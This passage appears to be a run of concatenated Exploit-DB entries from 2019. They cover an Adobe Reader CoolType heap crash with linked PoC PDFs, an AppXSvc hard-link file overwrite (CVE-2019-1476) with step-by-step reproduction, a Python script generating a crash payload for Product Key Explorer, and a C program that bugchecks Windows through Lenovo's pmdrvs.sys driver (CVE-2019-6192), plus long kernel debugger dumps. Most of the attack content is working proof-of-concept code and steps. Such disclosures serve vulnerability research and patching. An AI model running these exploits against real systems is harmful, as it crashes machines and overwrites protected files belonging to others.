00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e 01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82 02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6 03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87 04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef 05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750 06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99 07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac 08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292 09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9 0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88 0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0 0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881 0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce 0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197 0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c --- cut --- Notes: - The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability. - Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though). - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case). - Attached samples: poc[1-4].pdf (crashing files). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip
-
AppXSvc 17763 - Arbitrary File Overwrite (DoS)
# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS)
# Date: 2019-10-28
# Exploit Author: Gabor Seljan
# Vendor Homepage: https://www.microsoft.com/
# Version: 17763.1.amd64fre.rs5_release.180914-1434
# Tested on: Windows 10 Version 1809 for x64-based Systems
# CVE: CVE-2019-1476

# Summary:
# AppXSvc improperly handles file hard links resulting in a low privileged user
# being able to overwrite an arbitrary file leading to elevation of privilege.

# Description:
# An elevation of privilege vulnerability exists when the AppX Deployment Server
# (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
# originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced
# to overwrite an arbitrary file by deleting all registry data files before
# creating the file hard link. As Nabeel Ahmed described in his write-up of
# CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with
# the original settings.dat template. However, additional settings.dat.LOG1 and
# settings.dat.LOG2 files are also created during the initialization process.
# Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard
# link allows a low privileged user to overwrite an arbitrary file with registry
# data or just simply empty it, respectively. A low privileged user could exploit
# this vulnerability to cause denial of service by overwriting critical system
# files.

Steps to reproduce:
1. Terminate Paint 3D processes.
2. Delete settings.* files in the Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder (under the user's %LOCALAPPDATA%\Packages).
3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini.
4. Execute the start ms-paint: command to run Paint 3D.
5. Terminate Paint 3D processes.

Expected result:
It isn't possible to overwrite a file not writable by a low privileged user.

Observed result:
C:\Windows\win.ini file is overwritten with registry data.

Notes for reproduction: step 3 relies on being able to create a hard link to a file the caller cannot open for write; later Windows 10 builds restrict this, so verify the link was actually created (e.g. fsutil hardlink list) before concluding a system is unaffected. The privileged write is performed by AppXSvc, and the attacker chooses only the destination (through the link), not the content - registry hive data via .LOG1 or an empty file via .LOG2 - which is why the demonstrated impact is denial of service rather than direct code execution.
References: https://github.com/sgabe/CVE-2019-1476 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476 https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
-
Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)
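#!/usr/bin/env python3
# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC)
# Discovery by: SajjadBnd
# Date: 2019-12-10
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro

# [ About App ]
# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
# Visit "Features" page to see all supported software list of programs with which product key finder works.
# Product key Explorer recovers product keys for software installed on your
# local and network computers, allows track the number of software licenses installed in your business.
# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.

# [ POC ]
# 1. Run the python script, it will create a new file "dos.txt"
# 2. Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 3. Paste the content of dos.txt into the Field: 'Key'
# 4. Click 'ok'
# 5. Crashed ;)
#
# Review notes: this is a crash in an interactive dialog of a user-mode
# tool and the PoC shows no control over the faulting state (the pattern is
# plain A/B/C filler, not a cyclic pattern, so no offset is established).
# Treat it as a local DoS / stability bug unless a debugger shows otherwise.
# Ported from Python 2; the file is written in binary mode so the 258 bytes
# are identical on every platform.

def build_payload():
    """Return the 258-byte pattern to paste into the 'Key' field."""
    buffer = b"\x41" * 100
    buffer += b"\x42" * 100
    buffer += b"\x43" * 58
    return buffer


def main():
    """Write the payload to dos.txt in the current directory."""
    buffer = build_payload()
    try:
        with open("dos.txt", "wb") as f:
            print("[+] Creating %s bytes DOS payload.." % len(buffer))
            f.write(buffer)
        print("[+] File created!")
    except OSError as exc:
        # Narrowed from a bare except; report why instead of hiding it.
        print("File cannot be created: %s" % exc)


if __name__ == "__main__":
    main()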
-
Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
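// Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
// Date: 2019-12-11
// Exploit Author: Nassim Asrir
// CVE: CVE-2019-6192
// Tested On: Windows 10(64bit) | ThinkPad T470p
// Vendor : https://www.lenovo.com/us/en/
// Ref : https://support.lenovo.com/us/fr/solutions/len-29334
//
// Description
// A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver
// The vulnerability exists due to insufficient input buffer validation when the driver processes IOCTL codes
// Attackers can explo t this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
//
// Review notes:
//  - The low two bits of IOCTL 0x80862013 are 3 (METHOD_NEITHER), so the
//    I/O manager passes the user pointers through untouched and does not
//    fill Irp->AssociatedIrp.SystemBuffer.  The dump below faults on
//    `mov eax,dword ptr [rdi]` with rdi == 0, i.e. a kernel-mode NULL read;
//    a driver that reads SystemBuffer regardless of the transfer method
//    would behave exactly like that, but this is inferred from the dump,
//    not from the driver's code.
//  - What the PoC demonstrates is bugcheck 0x3B (DoS).  The "possibly
//    execute arbitrary code" claim is not shown: neither a controlled
//    write nor a controlled pointer appears in the crash context.
//  - Whether a standard user can open \\.\pmdrvs with GENERIC_READ |
//    GENERIC_WRITE depends on the device object's DACL, which is not
//    shown here; check it (e.g. accesschk) before rating this as
//    unprivileged-triggerable.
//  - The original printed an error when CreateFileA() failed and then
//    called DeviceIoControl()/CloseHandle() on INVALID_HANDLE_VALUE
//    anyway; it now exits with the Win32 error code.

#include <windows.h>
#include <stdio.h>
#include <conio.h>

int main(int argc, char **argv)
{
    HANDLE hDevice;
    DWORD bret = 0;
    char szDevice[] = "\\\\.\\pmdrvs";

    printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
    printf("Opening handle to driver..\n");

    hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Error: Error opening device %s (GetLastError=%lu)\n", szDevice, GetLastError());
        return 1;
    }
    printf("Device %s succesfully opened!\n", szDevice);
    printf("\tHandle: %p\n", hDevice);

    printf("\nPress any key to DoS..");
    _getch();

    /* Bogus buffer pointers with zero length; the machine is expected to
     * bugcheck inside the driver before DeviceIoControl returns. */
    if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) {
        printf("DeviceIoControl Error - bytes returned %#lx\n", bret);
    }

    CloseHandle(hDevice);
    return 0;
}

# RCA 2:

kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.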
Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. FAULTING_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50) rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? Resetting default scope CPU_COUNT: 8 CPU_MHZ: af8 CPU_VENDOR: GenuineIntel CPU_FAMILY: 6 CPU_MODEL: 9e CPU_STEPPING: 9 CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init) BLACKBOXBSD: 1 (!blackboxbsd) BLACKBOXPNP: 1 (!blackboxpnp) CURRENT_IRQL: 0 ANALYSIS_SESSION_HOST: LAPTOP-SP ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485 ANALYSIS_VERSION: 10.0.17763.132 amd64fre LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d STACK_TEXT: ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060 ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59 ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071 ffffc709`dee8f7e0 fffff804`1f64c356 : 
00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56 ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925 00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844 THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b FOLLOWUP_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] FAULT_INSTR_CODE: 8941078b SYMBOL_STACK_INDEX: 0 FOLLOWUP_NAME: MachineOwner STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb BUGCHECK_STR: 2E8B5A19 EXCEPTION_CODE_STR: 2E8B5A19 EXCEPTION_STR: WRONG_SYMBOLS PROCESS_NAME: ntoskrnl.wrong.symbols.exe IMAGE_NAME: ntoskrnl.wrong.symbols.exe MODULE_NAME: nt_wrong_symbols SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000 BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000 TARGET_TIME: 2019-09-30T19:27:36.000Z OSBUILD: 17763 OSSERVICEPACK: 0 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 SUITE_MASK: 272 PRODUCT_TYPE: 1 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS OS_LOCALE: USER_LCID: 0 OSBUILD_TIMESTAMP: 1994-09-30 01:21:45 BUILDDATESTAMP_STR: 180914-1434 BUILDLAB_STR: rs5_release BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434 ANALYSIS_SESSION_ELAPSED_TIME: ae ANALYSIS_SOURCE: KM 
FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000 FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1} Followup: MachineOwner --------- 2: kd> u fffff804`28bf109d pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000) fffff804`28bf10a8 85c0 test eax,eax fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132) fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h] fffff804`28bf10b8 4885c9 test rcx,rcx fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132) 2: kd> !for_each_frame .frame /r @$Frame _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!KeBugCheckEx: fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc 
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7f09: fffff804`1f27a8e9 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x735c: fffff804`1f279d3c b801000000 mov eax,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!_chkstk+0x41f: fffff804`1f271b4f 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 
gs=002b efl=00000282 nt!RtlUnwindEx+0x3440: fffff804`1f1ca460 8bd0 mov edx,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000 rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40 r14=ffffc709dee8f4b0 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!ExReleaseAutoExpandPushLockExclusive+0x264: fffff804`1f0d7c24 84c0 test al,al _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7fe2: fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng 
nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x42ce: fffff804`1f276cae 440f20c0 mov rax,cr8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000 rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x5060: fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei 
ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!IofCallDriver+0x59: fffff804`1f12dba9 4883c438 add rsp,38h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtQueryInformationFile+0x1071: fffff804`1f6abb11 448bf0 mov r14d,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0 rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtClose+0xffc: fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 
r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtDeviceIoControlFile+0x56: fffff804`1f64c356 4883c468 add rsp,68h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7925: fffff804`1f27a305 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 00007fff`33aaf844 ?? ??? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 